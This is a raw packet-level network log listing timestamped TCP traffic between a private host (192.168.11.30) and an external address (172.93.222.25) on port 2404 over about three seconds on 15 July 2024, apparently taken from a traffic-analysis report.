                                                Jul 15, 2024 09:24:52.038985968 CEST498652404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:52.039012909 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.039333105 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.108027935 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.111991882 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:52.233889103 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.277466059 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:52.277545929 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:52.277566910 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:52.277770042 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:52.278815031 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:52.278955936 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:52.279292107 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:52.279457092 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:52.286762953 CEST240449865172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.348901033 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.349066019 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:52.471962929 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.472022057 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.472034931 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.472112894 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.473145008 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.473254919 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.473267078 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.473534107 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.473661900 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.473673105 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.473908901 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.550337076 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.550359011 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.550431013 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.550456047 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.550479889 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.550498962 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.550513983 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.550528049 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.550540924 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.550555944 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.550581932 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:52.551146030 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:52.551146030 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:52.551162004 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:52.551162004 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:52.745254993 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.745352030 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.745592117 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:52.745888948 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.745973110 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.746047020 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.746121883 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.746181965 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:52.746186018 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.746260881 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.746325970 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:52.746344090 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.746412039 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.746419907 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:52.746488094 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.746551991 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.746566057 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:52.746614933 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.746685028 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.746736050 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:52.746745110 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.746818066 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.746882915 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:52.746895075 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.746961117 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.746975899 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:52.747034073 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.747101068 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.747106075 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:52.747247934 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:52.941049099 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.941066980 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.941080093 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.941092014 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.941267014 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:52.942059994 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.942135096 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.942213058 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.942224979 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.942239046 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.942250967 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.942291021 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.942303896 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.942316055 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.942327976 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.942338943 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.942351103 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.942363024 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.942374945 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.942385912 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:52.942388058 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.942385912 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:52.942401886 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.942482948 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:52.942482948 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:52.942502975 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:52.942502975 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:52.942502975 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:52.942630053 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.942641973 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.942652941 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.942663908 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.942675114 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.942686081 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.942697048 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.942708015 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.942718983 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.942729950 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.942742109 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.942758083 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.942769051 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.942780018 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.942790985 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.942801952 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.942815065 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.942826986 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.942857981 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.942863941 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:52.942863941 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:52.942871094 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:52.942925930 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:52.942939997 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:52.942939997 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:52.942986965 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:53.054408073 CEST498652404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:53.135718107 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.135734081 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.135971069 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.135984898 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.135997057 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.136010885 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.136014938 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:53.136023998 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.136037111 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.136210918 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:53.136655092 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.136738062 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.136790037 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.136801958 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.136878014 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.136892080 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.136900902 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:53.136914968 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.136928082 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.136940002 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.136953115 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:53.136965990 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.136977911 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.136991024 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.137017965 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:53.137278080 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.137331963 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.137343884 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.137355089 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.137366056 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.137402058 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.137479067 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.137490988 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.137501955 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.137512922 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.137525082 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.137536049 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.137556076 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.137578964 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:53.137604952 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.137618065 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.137629986 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.137685061 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:53.137696981 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.137708902 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.137734890 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.137770891 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:53.137770891 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:53.137770891 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:53.137770891 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:53.137784004 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.137789965 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:53.137789965 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:53.137809038 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.137834072 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.137835979 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:53.137846947 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.596374035 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.596385956 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.596396923 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.596406937 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.596477985 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:53.596477985 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:53.596494913 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:53.596494913 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:53.596623898 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:53.598160982 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.598176003 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.598187923 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.598283052 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.598298073 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.598309040 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.598320961 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.598331928 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.598344088 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.598345995 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:53.598361015 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.598387957 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.598400116 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.598409891 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.598496914 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:53.598496914 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:53.598511934 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:53.598613977 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:53.600403070 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.600569963 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.600584030 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.600595951 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.600606918 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.600617886 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.600629091 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.600640059 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.600651026 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.600661993 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.600672960 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.600682974 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.600693941 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.600749969 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:53.600749969 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:53.600910902 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:53.602798939 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.602933884 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.602948904 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.602961063 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.602981091 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.602984905 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:53.602998972 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.603009939 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.603020906 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.603100061 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.603101969 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:53.603116035 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.603127003 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.603151083 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.603250980 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:53.603250980 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:53.603275061 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.603421926 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:53.605016947 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.605026960 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.605057001 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.605070114 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.605081081 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.605180979 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.605195999 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.605197906 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:53.605212927 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.605223894 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.605236053 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.605247021 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.605257034 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.605268002 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.605371952 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:53.605371952 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:53.605541945 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:53.783941031 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.783956051 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.784116030 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:53.784164906 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.784207106 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.784240007 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.784255028 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.784265995 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.784276962 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.784288883 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.784300089 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.784311056 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.784322023 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.784324884 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:53.784337997 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.784409046 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:53.784502029 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:53.784930944 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.784943104 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.784955978 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.784965038 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:53.785150051 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:54.069842100 CEST498652404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:54.264764071 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:54.317387104 CEST240449865172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:54.318384886 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:54.318404913 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:54.318453074 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:54.318654060 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:54.320707083 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:54.320833921 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:54.320885897 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:54.321228027 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:54.512837887 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:54.512851000 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:54.513034105 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:54.513159990 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:54.515100956 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:54.515113115 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:54.515345097 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:54.515357018 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:54.515654087 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:54.515666008 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:55.085314035 CEST498652404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:55.280546904 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:55.333040953 CEST240449865172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:55.334795952 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:55.340873003 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:55.340919971 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:55.340971947 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:55.341140032 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:55.342720985 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:55.342852116 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:55.343008995 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:55.343355894 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:55.343533993 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:55.343672991 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:55.400712013 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:55.400784969 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:55.400844097 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:55.535618067 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:55.535629988 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:55.535654068 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:55.535662889 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:55.537034988 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:55.537144899 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:55.537273884 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:55.537633896 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:55.537645102 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:55.537760019 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:55.538031101 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:55.595196009 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:55.595290899 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:55.595412970 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:55.595434904 CEST240449867172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:24:55.595580101 CEST498672404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:24:55.595580101 CEST498672404192.168.11.30172.93.222.25
